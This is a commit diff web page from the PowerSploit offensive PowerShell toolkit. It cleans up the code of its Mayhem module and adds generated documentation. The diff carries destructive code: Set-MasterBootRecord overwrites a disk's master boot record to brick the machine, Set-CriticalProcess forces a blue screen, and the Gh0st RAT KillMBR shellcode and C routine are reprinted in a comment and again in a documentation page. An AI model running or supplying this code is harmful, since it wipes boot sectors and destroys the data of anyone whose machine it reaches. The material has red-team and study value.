Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

For ./Mayhem/ : 

-PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs
This commit is contained in:
HarmJ0y 2016-12-14 18:05:22 -05:00
parent 1980f403ee
commit a81faf36a4
4 changed files with 390 additions and 92 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

178
Mayhem/Mayhem.psm1
View File

@ -3,109 +3,109 @@ function Set-MasterBootRecord
<# <#
.SYNOPSIS .SYNOPSIS
Proof of concept code that overwrites the master boot record with the Proof of concept code that overwrites the master boot record with the
message of your choice. message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
Set-MasterBootRecord is proof of concept code designed to show that it is Set-MasterBootRecord is proof of concept code designed to show that it is
possible with PowerShell to overwrite the MBR. This technique was taken possible with PowerShell to overwrite the MBR. This technique was taken
from a public malware sample. This script is inteded solely as proof of from a public malware sample. This script is inteded solely as proof of
concept code. concept code.
.PARAMETER BootMessage .PARAMETER BootMessage
Specifies the message that will be displayed upon making your computer a brick. Specifies the message that will be displayed upon making your computer a brick.
.PARAMETER RebootImmediately .PARAMETER RebootImmediately
Reboot the machine immediately upon overwriting the MBR. Reboot the machine immediately upon overwriting the MBR.
.PARAMETER Force .PARAMETER Force
Suppress the warning prompt. Suppress the warning prompt.
.EXAMPLE .EXAMPLE
Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC' Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
.NOTES .NOTES
Obviously, this will only work if you have a master boot record to Obviously, this will only work if you have a master boot record to
overwrite. This won't work if you have a GPT (GUID partition table) overwrite. This won't work if you have a GPT (GUID partition table).
#>
<#
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers // CGh0stApp message handlers
unsigned char scode[] = unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR() int CGh0stApp::KillMBR()
{ {
HANDLE hDevice; HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned; DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0}; BYTE pMBR[512] = {0};
// ????MBR // ????MBR
memcpy(pMBR, scode, sizeof(scode) - 1); memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55; pMBR[510] = 0x55;
pMBR[511] = 0xAA; pMBR[511] = 0xAA;
hDevice = CreateFile hDevice = CreateFile
( (
"\\\\.\\PHYSICALDRIVE0", "\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, NULL,
OPEN_EXISTING, OPEN_EXISTING,
0, 0,
NULL NULL
); );
if (hDevice == INVALID_HANDLE_VALUE) if (hDevice == INVALID_HANDLE_VALUE)
return -1; return -1;
DeviceIoControl DeviceIoControl
( (
hDevice, hDevice,
FSCTL_LOCK_VOLUME, FSCTL_LOCK_VOLUME,
NULL, NULL,
0, 0,
NULL, NULL,
0, 0,
&dwBytesReturned, &dwBytesReturned,
NULL NUL
); )
// ?????? // ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl DeviceIoControl
( (
hDevice, hDevice,
FSCTL_UNLOCK_VOLUME, FSCTL_UNLOCK_VOLUME,
NULL, NULL,
0, 0,
NULL, NULL,
0, 0,
&dwBytesReturned, &dwBytesReturned,
NULL NULL
); );
CloseHandle(hDevice); CloseHandle(hDevice);
ExitProcess(-1); ExitProcess(-1);
return 0; return 0;
} }
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[ValidateLength(1, 479)] [ValidateLength(1, 479)]
[String] [String]
$BootMessage = 'Stop-Crying; Get-NewHardDrive', $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
$MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize) $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
# Zero-initialize the allocated unmanaged memory # Zero-initialize the allocated unmanaged memory
0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } 0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
[Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length) [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
@ -272,11 +272,11 @@ function Set-CriticalProcess
Causes your machine to blue screen upon exiting PowerShell. Causes your machine to blue screen upon exiting PowerShell.
PowerSploit Function: Set-CriticalProcess PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
.PARAMETER ExitImmediately .PARAMETER ExitImmediately
@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[Switch] [Switch]
$Force, $Force,
@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose
{ {
$Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.') $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
} }
if (!$Response) if (!$Response)
{ {
return return

108
docs/Mayhem/Set-CriticalProcess.md Executable file
View File

@ -0,0 +1,108 @@
# Set-CriticalProcess
## SYNOPSIS
Causes your machine to blue screen upon exiting PowerShell.
PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
```
## DESCRIPTION
{{Fill in the Description}}
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Set-CriticalProcess
```
### -------------------------- EXAMPLE 2 --------------------------
```
Set-CriticalProcess -ExitImmediately
```
### -------------------------- EXAMPLE 3 --------------------------
```
Set-CriticalProcess -Force -Verbose
```
## PARAMETERS
### -Force
Set the running PowerShell process as critical without asking for confirmation.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -ExitImmediately
Immediately exit PowerShell after successfully marking the process as critical.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -WhatIf
Shows what would happen if the cmdlet runs.
The cmdlet is not run.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: wi
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Confirm
Prompts you for confirmation before running the cmdlet.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: cf
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS

184
docs/Mayhem/Set-MasterBootRecord.md Executable file
View File

@ -0,0 +1,184 @@
# Set-MasterBootRecord
## SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
```
## DESCRIPTION
Set-MasterBootRecord is proof of concept code designed to show that it is
possible with PowerShell to overwrite the MBR.
This technique was taken
from a public malware sample.
This script is inteded solely as proof of
concept code.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
```
## PARAMETERS
### -BootMessage
Specifies the message that will be displayed upon making your computer a brick.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 1
Default value: Stop-Crying; Get-NewHardDrive
Accept pipeline input: False
Accept wildcard characters: False
```
### -RebootImmediately
Reboot the machine immediately upon overwriting the MBR.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -Force
Suppress the warning prompt.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -WhatIf
Shows what would happen if the cmdlet runs.
The cmdlet is not run.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: wi
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Confirm
Prompts you for confirmation before running the cmdlet.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: cf
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
Obviously, this will only work if you have a master boot record to
overwrite.
This won't work if you have a GPT (GUID partition table).
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers
unsigned char scode\[\] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR\[512\] = {0};
// ????MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR\[510\] = 0x55;
pMBR\[511\] = 0xAA;
hDevice = CreateFile
(
"\\\\\\\\.\\\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NUL
)
// ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
## RELATED LINKS

12
mkdocs.yml
View File

@ -124,7 +124,11 @@ pages:
- Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md' - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
- CodeExecution: - CodeExecution:
- Functions: - Functions:
- Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md' - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md' - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md' - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
- Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md' - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
- Mayhem:
- Functions:
- Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
- Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'